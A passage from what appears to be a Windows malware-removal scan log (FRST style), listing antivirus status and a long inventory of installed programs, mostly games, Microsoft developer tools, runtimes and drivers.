AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\uTorrent) (Version: 3.4.3.40298 - BitTorrent Inc.)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Flash Player 22 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Alien: Isolation (HKLM-x32\...\Steam App 214490) (Version:  - Creative Assembly)
Allegorithmic Bitmap2Material 3.0.2 Trial (HKLM-x32\...\bitmap2material_3_x) (Version: 3.0.2 build 14714 (2014-11-13) - Allegorithmic)
altPUG (HKLM-x32\...\{4FC41018-ABBF-47A0-B917-2DA88C04DA7D}) (Version: 1.2 - altPUG LLC)
Application Insights Tools for Visual Studio 2015 (x32 Version: 3.3 - Microsoft Corporation) Hidden
Arma 2 (HKLM-x32\...\Steam App 33900) (Version:  - Bohemia Interactive)
Arma 2: British Armed Forces (HKLM-x32\...\Steam App 65700) (Version:  - Bohemia Interactive)
Arma 2: Operation Arrowhead (HKLM-x32\...\Steam App 33930) (Version:  - Bohemia Interactive)
Arma 2: Private Military Company (HKLM-x32\...\Steam App 65720) (Version:  - Bohemia Interactive)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version:  - Bohemia Interactive)
ArmA3Sync 1.4.54 (HKLM-x32\...\{F097E7D7-D093-4394-9EED-43AFCCD12B7A}_is1) (Version: 1.4.54 - The [S.o.E] team)
Audacity 2.0.6 (HKLM-x32\...\Audacity_is1) (Version: 2.0.6 - Audacity Team)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
Awesomium Redistributable (HKLM-x32\...\{5BCB064B-9F65-4E15-BAFB-669E72E54FD9}) (Version: 1.7.4.2 - SIX Networks GmbH)
AwesomiumSetup (HKLM-x32\...\{19EF99D1-7EE6-4B5E-ABEE-0B3825F703B0}) (Version: 1.00.0000 - SIX Networks GmbH)
Azure AD Authentication Connected Service (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
AzureTools.Notifications (x32 Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.7.2.45672 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.3.0 - EA Digital Illusions CE AB)
BattlEye for OA Uninstall (HKLM-x32\...\BattlEye for OA) (Version:  - )
BattlEye Uninstall (HKLM-x32\...\BattlEye for A2) (Version:  - )
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version:  - Irrational Games)
Blend for Visual Studio SDK for .NET 4.5 (x32 Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Blender (HKLM\...\Blender) (Version: 2.73 - Blender Foundation)
Brother HL-3045CN (HKLM-x32\...\{409529DB-DBB1-40F8-84DC-8D97880D3FC6}) (Version: 1.00 - Brother)
CEVO CS:GO Client Beta version 1.0 (HKLM-x32\...\CEVO CS:GO Client Beta_is1) (Version: 1.0 - )
Counter-Strike: Global Offensive - SDK (HKLM-x32\...\Steam App 745) (Version:  - )
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
CPUID CPU-Z 1.71.1 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Creative ALchemy (HKLM-x32\...\ALchemy) (Version: 1.43 - Creative Technology Limited)
Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.41 - Creative Technology Limited)
Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.03 - Creative Technology Limited)
Creative System Information (HKLM-x32\...\SysInfo) (Version:  - )
Crysis (HKLM\...\Steam App 17300) (Version:  - Crytek)
Crystal Reports for Visual Studio (x32 Version: 12.51.0.240 - SAP) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd)
Debian-Installer loader (HKLM-x32\...\Debian-Installer Loader) (Version: 0.7.4.7+deb7u2+bsos1 - The Debian Project)
DOOM 3: BFG Edition (HKLM-x32\...\Steam App 208200) (Version:  - id Software)
Dotfuscator and Analytics Community Edition 5.18.1 (x32 Version: 5.18.1.2898 - PreEmptive Solutions) Hidden
Dotfuscator Software Services - Community Edition (HKLM-x32\...\{1AA5BD63-6614-44B2-88A7-605191EDB835}) (Version: 5.0.2500.0 - PreEmptive Solutions)
Dreamfall Chapters (HKLM-x32\...\Steam App 237850) (Version:  - Red Thread Games)
Dropbox (HKLM-x32\...\Dropbox) (Version: 12.4.22 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.35.1 - Dropbox, Inc.) Hidden
Dxtory version 2.0.126 (HKLM-x32\...\Dxtory2.0_is1) (Version: 2.0.126 - ExKode Co. Ltd.)
EasyBCD 2.2 (HKLM-x32\...\EasyBCD) (Version: 2.2 - NeoSmart Technologies)
ESEA (HKLM\...\Steam App 479130) (Version:  - ESEA)
ESEA Client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\ESEA) (Version: 5.0.0.0 - E-Sports Entertainment LLC)
ESN Sonar (HKLM-x32\...\ESN Sonar-0.70.4) (Version: 0.70.4 - ESN Social Software AB)
EVGA PrecisionX 16 (HKLM-x32\...\{4C5ECFC6-AF6E-42A0-988D-0A5FCBB8F0B9}) (Version: 5.3.11 - EVGA Corporation)
FaceRig (HKLM-x32\...\Steam App 274920) (Version:  - Holotech Studios)
FaceRig Virtual Video driver version 1.0.1.1000 (HKLM-x32\...\{7D6A1A0F-F57E-4C6B-9331-86CBC7D5C787}_is1) (Version: 1.0.1.1000 - Adoriasoft LLC)
Far Cry (HKLM\...\Steam App 13520) (Version:  - Crytek Studios)
Free Video Editor version 1.4.12.525 (HKLM-x32\...\Free Video Editor_is1) (Version: 1.4.12.525 - DVDVideoSoft Ltd.)
GameSpy Comrade (HKLM-x32\...\{5F4C776F-8CBD-4C4F-892F-B568ABDD70C8}) (Version: 1.5.0.156 - GameSpy)
Geeks3D.com FurMark 1.9.2 (HKLM-x32\...\{2397CAD4-2263-4CD0-96BE-E43A980B9C9A}_is1) (Version:  - Geeks3D.com)
GIMP 2.8.18 (HKLM\...\GIMP-2_is1) (Version: 2.8.18 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)
Google Earth (HKLM-x32\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1.5.1557 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\Steam App 12210) (Version:  - Rockstar North)
Grand Theft Auto V (HKLM-x32\...\{E01FA564-2094-4833-8F2F-1FFEC6AFCC46}) (Version: "1.00.0000" - Rockstar Games)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
Heaven Benchmark version 4.0 (HKLM-x32\...\Unigine Heaven Benchmark (Basic Edition)_is1) (Version: 4.0 - Unigine Corp.)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.37 - Irfan Skiljan)
iZ3D Driver Remove (HKLM-x32\...\{30BEF9F2-CD3F-4B13-9E5C-BFE2F9544572}_is1) (Version: 1.13(5443) - iZ3D Inc.)
Jasc Paint Shop Pro 9 (HKLM-x32\...\{F843C6A3-224D-4615-94F8-3C461BD9AEA0}) (Version: 9.00.0000 - Jasc Software Inc)
Java 7 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.650 - Oracle)
Java 7 Update 75 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F06417075FF}) (Version: 7.0.750 - Oracle)
Java SE Development Kit 7 Update 75 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0170750}) (Version: 1.7.0.750 - Oracle)
JMicron JMB36X Driver (HKLM-x32\...\{3A1B5D40-41E9-43FA-8C7B-A8667F5586EF}) (Version: 1.17.65.11 - JMicron Technology Corp.)
Juniper Networks Host Checker (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\Neoteris_Host_Checker) (Version: 8.0.7.32723 - Juniper Networks)
Juniper Networks Setup Client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\Juniper_Setup_Client) (Version: 8.0.7.50111 - Juniper Networks)
Juniper Networks Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Juniper Networks Setup Client Activex Control (HKLM-x32\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Juniper Terminal Services Client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\Juniper_Term_Services) (Version: 8.0.7.32723 - Juniper Networks)
Killing Floor 2 (HKLM-x32\...\Steam App 232090) (Version:  - Tripwire Interactive)
K-Lite Codec Pack 10.8.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.8.0 - )
L3DT Professional v15.01.0.1 (remove only) (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\L3DT Professional (v15.01.0.1)) (Version:  - )
Lagarith Lossless Codec (1.3.27) (HKLM-x32\...\{F59AC46C-10C3-4023-882C-4212A92283B3}_is1) (Version:  - )
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
Logitech Gaming Software 8.74 (HKLM\...\Logitech Gaming Software) (Version: 8.74.80 - Logitech Inc.)
Logos Bible Software (HKLM-x32\...\{CD408DC0-F28A-4909-A18D-218C1394A59B}) (Version: 6.224.65 - Faithlife Corporation)
LOOT version 0.8.1 (HKLM-x32\...\{BF634210-A0D4-443F-A657-0DCE38040374}_is1) (Version: 0.8.1 - LOOT Team)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
marvell 91xx driver (HKLM-x32\...\MagniDriver) (Version: 1.0.0.1036 - Marvell)
Marvell Miniport Driver (HKLM-x32\...\Marvell Miniport Driver) (Version: 11.10.5.3 - Marvell)
Mass Effect™ (HKLM-x32\...\{44A570EE-FD93-4086-8997-2C38DFDE0019}) (Version: 1.2.20608.0 - Electronic Arts)
MechWarrior Online (HKLM-x32\...\{73bcb521-8936-42d7-ad00-ec2bb399e26c}) (Version: 1.4.3.0 - Piranha Games Inc.)
MechWarrior Online (x32 Version: 1.4.3.0 - Piranha Games Inc.) Hidden
Medal of Honor Allied Assault (HKLM-x32\...\{0DEA94ED-915A-4834-A87E-388D012C8E02}) (Version:  - )
METAL GEAR SOLID V: GROUND ZEROES (HKLM-x32\...\Steam App 311340) (Version:  - Kojima Productions)
METAL GEAR SOLID V: THE PHANTOM PAIN (HKLM-x32\...\Steam App 287700) (Version:  - Konami Digital Entertainment)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{B941AFB4-8851-33A1-9E72-0C33D463C41C}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.6 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{3D3CEBE6-40EA-4C48-97FD-73828281AB4A}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools (HKLM-x32\...\{40416836-56CC-4C0E-A6AF-5C34BADCE483}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE (HKLM-x32\...\{2C9EE786-1DDB-4C98-8FA4-B1B9B5A66B77}) (Version: 3.1.186.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.23107 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Silverlight 3 SDK (HKLM-x32\...\{2012098D-EEE9-4769-8DD3-B038050854D4}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft Silverlight 4 SDK (HKLM-x32\...\{05855322-BE43-41FE-B583-D3AE0C326D58}) (Version: 4.0.50826.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (64-bit) (HKLM\...\Microsoft SQL Server 10 Release) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 Browser (HKLM-x32\...\{C688457E-03FD-4941-923B-A27F4D42A7DD}) (Version: 10.1.2531.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{BBDE8A3D-64A2-43A6-95F3-C27B87DF7AC1}) (Version: 10.1.2531.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Framework (HKLM-x32\...\{BC537AE0-88AF-47ED-B762-33B0D62B5188}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Project (HKLM-x32\...\{7A56D81D-6406-40E7-9184-8AC1769C4D69}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{77F1F8AD-51B8-4490-AEEC-BF480073E0FC}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (x64) (HKLM\...\{EAEBF166-B06A-4D7F-BAF7-6615303D5C7C}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Transact-SQL Language Service (HKLM-x32\...\{09C52940-A4D1-4409-A7CC-1AAE630CF578}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{D4AD39AD-091E-4D33-BB2B-59F6FCB8ADC3}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Database Publishing Wizard 1.4 (HKLM-x32\...\{ACE28263-76A4-4BF5-B6F4-8BD719595969}) (Version: 10.1.2512.8 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{877B76B2-F83F-4F5A-B28D-3F398641ADB6}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (x64) (HKLM\...\{1E6ED082-E32D-4B2B-8B6A-70B094815135}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{0826F9E4-787E-481D-83E0-BC6A57B056D5}) (Version: 10.1.2531.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime v1.0 SP1 (x64) (HKLM\...\{8438EC02-B8A9-462D-AC72-1B521349C001}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework SDK v1.0 SP1 (HKLM-x32\...\{0E3DFC64-CC49-4BE2-8C9C-58EF129675DB}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework Services v1.0 SP1 (x64) (HKLM\...\{034106B5-54B7-467F-B477-5B7DBB492624}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Services for ADO.NET v2.0 SP1 (x64) (HKLM\...\{1D1CEEF8-3741-45BD-8E77-963E1DEBDDD3}) (Version: 2.0.3010.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{68BA34E8-9B9D-4A74-83F0-7D366B532D75}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{718FFB65-F6E4-4D62-861F-ED10ED32C936}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft Team Foundation Server 2010 Object Model - ENU (HKLM\...\Microsoft Team Foundation Server 2010 Object Model - ENU) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Basic PowerPacks 10.0 (HKLM-x32\...\{85317F07-8719-36EF-B19E-B196F383D0F3}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{86CE1746-9EFF-3C9C-8755-81EA8903AC34}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 (HKLM-x32\...\{B7E38540-E355-3503-AFD7-635B2F2F76E1}) (Version: 9.0.30729.4974 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Designtime - 10.0.30319 (HKLM\...\{F5079164-1DB9-3BDA-853B-F78AF67CE071}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Runtime - 10.0.40219 (HKLM\...\{1C7C8AAF-A16D-32E8-89E5-F6D165DE0BCE}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{85467CBC-7A39-33C9-8940-D72D9269B84F}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{14DD7530-CCD2-3798-B37D-3839ED6A441C}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Professional - ENU (HKLM-x32\...\Microsoft Visual Studio 2010 Professional - ENU) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Service Pack 1 (HKLM-x32\...\Microsoft Visual Studio 2010 Service Pack 1) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2015 Tools for Unity (HKLM-x32\...\{F0DB2786-18C8-4B0D-9DC2-BA58856A2821}) (Version: 2.1.0.0 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 (HKLM-x32\...\{50b32652-69d2-4b93-9316-edcd12067b8b}) (Version: 14.0.23107.10 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools (HKLM-x32\...\Microsoft Visual Studio Macro Tools) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle-earth: Shadow of Mordor (HKLM-x32\...\Steam App 241930) (Version:  - Monolith Productions, Inc.)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Minimal ADB and Fastboot version 1.2 (HKLM-x32\...\{06C90FCC-4C95-4142-A0AF-D3A4C12882DE}_is1) (Version: 1.2 - Sam Rodberg)
MiniTool Partition Wizard Free 9.0 (HKLM-x32\...\{05D996FA-ADCB-4D23-BA3C-A7C184A8FAC6}_is1) (Version:  - MiniTool Solution Ltd.)
Monitor Calibration Wizard 1.0 (HKLM-x32\...\Monitor Calibration Wizard) (Version:  - )
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 47.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 en-US)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
Multi-Device Hybrid Apps using C# - Templates - ENU (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
Mumble 1.2.16 (HKLM-x32\...\{8C0C80AA-EA4D-4461-8B73-15A3A27F7D98}) (Version: 1.2.16 - Thorvald Natvig)
NEC Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{D7BF9739-8A68-4335-BBEE-37752AD9E86B}) (Version: 1.0.19.0 - NEC Electronics Corporation)
NEC Electronics USB 3.0 Host Controller Driver (x32 Version: 1.0.19.0 - NEC Electronics Corporation) Hidden
NetLimiter 4 (HKLM-x32\...\NetLimiter 4 4.0.10.0) (Version: 4.0.10.0 - Locktime Software)
NetLimiter 4 (Version: 4.0.10.0 - Locktime Software) Hidden
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.61.2 - Black Tree Gaming)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.8.6 - Notepad++ Team)
NVIDIA Graphics Driver 359.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 359.06 - NVIDIA Corporation)
NVIDIA Photoshop Plug-ins (HKLM-x32\...\{23F79416-CAD1-41BF-99A3-040F6C814AAA}) (Version: 8.50 - )
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
OBS Multiplatform (HKLM-x32\...\OBS Multiplatform) (Version: 0.12.2 - OBS Project)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 0.14.2 - OBS Project)
